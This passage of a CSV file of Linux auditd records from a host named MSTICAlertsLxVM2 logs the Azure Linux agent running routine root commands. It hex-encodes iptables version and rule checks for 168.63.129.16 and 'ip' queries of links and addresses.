['proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50']}]"
+37,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505667.408:9077959,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749f1b950', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28104', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+38,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505667.412:9077960,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=555c9f568bb8', 'a1=555c9f568b70', 'a2=555c9f568b88', 'a3=7f537f968810', 'items=2', 'ppid=28104', 'pid=28105', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+39,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505667.416:9077961,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749f1b950', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28106', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
+40,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505667.416:9077962,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=5575c3ad57e0', 'a1=5575c3ad5728', 'a2=5575c3ad57b0', 'a3=7f86758ab810', 'items=2', 'ppid=28106', 'pid=28107', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=16', 'a0=""iptables""', 'a1=""-w""', 'a2=""-t""', 'a3=""security""', 'a4=""-C""', 'a5=""OUTPUT""', 'a6=""-d""', 'a7=""168.63.129.16""', 'a8=""-p""', 'a9=""tcp""', 'a10=""-m""', 'a11=""conntrack""', 'a12=""--ctstate""', 'a13=""INVALID,NEW""', 'a14=""-j""', 'a15=""DROP""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50']}]"
+41,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505671.424:9077963,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174c1f27b0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28108', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=6970202D61202D6F206C696E6B']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D63006970202D61202D6F206C696E6B']}]"
+42,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505671.428:9077964,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55d86a7e4c28', 'a1=55d86a7e4bd0', 'a2=55d86a7e4bf8', 'a3=7f0447760810', 'items=2', 'ppid=28108', 'pid=28109', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""ip""', 'exe=""/bin/ip""', 'key=(null)']}, {'EXECVE': ['argc=4', 'a0=""ip""', 'a1=""-a""', 'a2=""-o""', 'a3=""link""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/ip""', 'inode=113', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=6970002D61002D6F006C696E6B']}]"
+43,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505671.432:9077965,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174c1f27b0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28110', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=6970202D34202D61202D6F2061646472657373']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D63006970202D34202D61202D6F2061646472657373']}]"
+44,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505671.436:9077966,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=562b79d53c70', 'a1=562b79d53c10', 'a2=562b79d53c40', 'a3=7fe9fac1d810', 'items=2', 'ppid=28110', 'pid=28111', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""ip""', 'exe=""/bin/ip""', 'key=(null)']}, {'EXECVE': ['argc=5', 'a0=""ip""', 'a1=""-4""', 'a2=""-a""', 'a3=""-o""', 'a4=""address""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/ip""', 'inode=113', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=6970002D34002D61002D6F0061646472657373']}]"
+45,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505671.440:9077967,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f174c1f27b0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28112', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=6970202D36202D61202D6F2061646472657373']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D63006970202D36202D61202D6F2061646472657373']}]"
+46,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505671.444:9077968,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55ecac75dc70', 'a1=55ecac75dc10', 'a2=55ecac75dc40', 'a3=7fdb9284a810', 'items=2', 'ppid=28112', 'pid=28113', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""ip""', 'exe=""/bin/ip""', 'key=(null)']}, {'EXECVE': ['argc=5', 'a0=""ip""', 'a1=""-6""', 'a2=""-a""', 'a3=""-o""', 'a4=""address""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/ip""', 'inode=113', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=6970002D36002D61002D6F0061646472657373']}]"
+47,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505672.428:9077969,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749e2ccd0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28114', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+48,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505672.428:9077970,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=555f5efe5bb8', 'a1=555f5efe5b70', 'a2=555f5efe5b88', 'a3=7f8d69d48810', 'items=2', 'ppid=28114', 'pid=28115', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+49,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505672.432:9077971,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749e2ccd0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28116', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
+50,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505672.436:9077972,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=564c1a13c7e0', 'a1=564c1a13c728', 'a2=564c1a13c7b0', 'a3=7f405e58a810', 'items=2', 'ppid=28116', 'pid=28117', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=16', 'a0=""iptables""', 'a1=""-w""', 'a2=""-t""', 'a3=""security""', 'a4=""-C""', 'a5=""OUTPUT""', 'a6=""-d""', 'a7=""168.63.129.16""', 'a8=""-p""', 'a9=""tcp""', 'a10=""-m""', 'a11=""conntrack""', 'a12=""--ctstate""', 'a13=""INVALID,NEW""', 'a14=""-j""', 'a15=""DROP""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50']}]"
+51,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505677.448:9077973,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749e74a70', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28118', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D2D76657273696F6E']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E']}]"
+52,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505677.452:9077974,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55b80e75cbb8', 'a1=55b80e75cb70', 'a2=55b80e75cb88', 'a3=7ff92fec4810', 'items=2', 'ppid=28118', 'pid=28119', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=2', 'a0=""iptables""', 'a1=""--version""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D2D76657273696F6E']}]"
+53,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505677.456:9077975,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749e74a70', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28120', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""sh""', 'exe=""/bin/dash""', 'key=(null)']}, {'EXECVE': ['argc=3', 'a0=""/bin/sh""', 'a1=""-c""', 'a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/bin/sh""', 'inode=26', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50']}]"
+54,52b1ab41-869e-4138-9e40-2a4457f09bf0,2019-02-18 16:00:00,MSTICAlertsLxVM2,1550505677.456:9077976,"[{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=558f1bd3d7e0', 'a1=558f1bd3d728', 'a2=558f1bd3d7b0', 'a3=7fc71fc36810', 'items=2', 'ppid=28120', 'pid=28121', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=4294967295', 'comm=""iptables""', 'exe=""/sbin/xtables-multi""', 'key=(null)']}, {'EXECVE': ['argc=16', 'a0=""iptables""', 'a1=""-w""', 'a2=""-t""', 'a3=""security""', 'a4=""-C""', 'a5=""OUTPUT""', 'a6=""-d""', 'a7=""168.63.129.16""', 'a8=""-p""', 'a9=""tcp""', 'a10=""-m""', 'a11=""conntrack""', 'a12=""--ctstate""', 'a13=""INVALID,NEW""', 'a14=""-j""', 'a15=""DROP""']}, {'CWD': ['cwd=""/var/lib/waagent/WALinuxAgent-2.2.36""']}, {'PATH': ['item=0', 'name=""/sbin/iptables""', 'inode=3951', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PATH': ['item=1', 'name=""/lib64/ld-linux-x86-64.so.2""', 'inode=2081', 'dev=08:01', 'mode=0100755', 'ouid=0', 'ogid=0', 'rdev=00:00', 'nametype=NORMAL', 'cap_fp=0000000000000000', 'cap_fi=0000000000000000', 'cap_fe=0', 'cap_fver=0']}, {'PROCTITLE': ['proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50']}]"
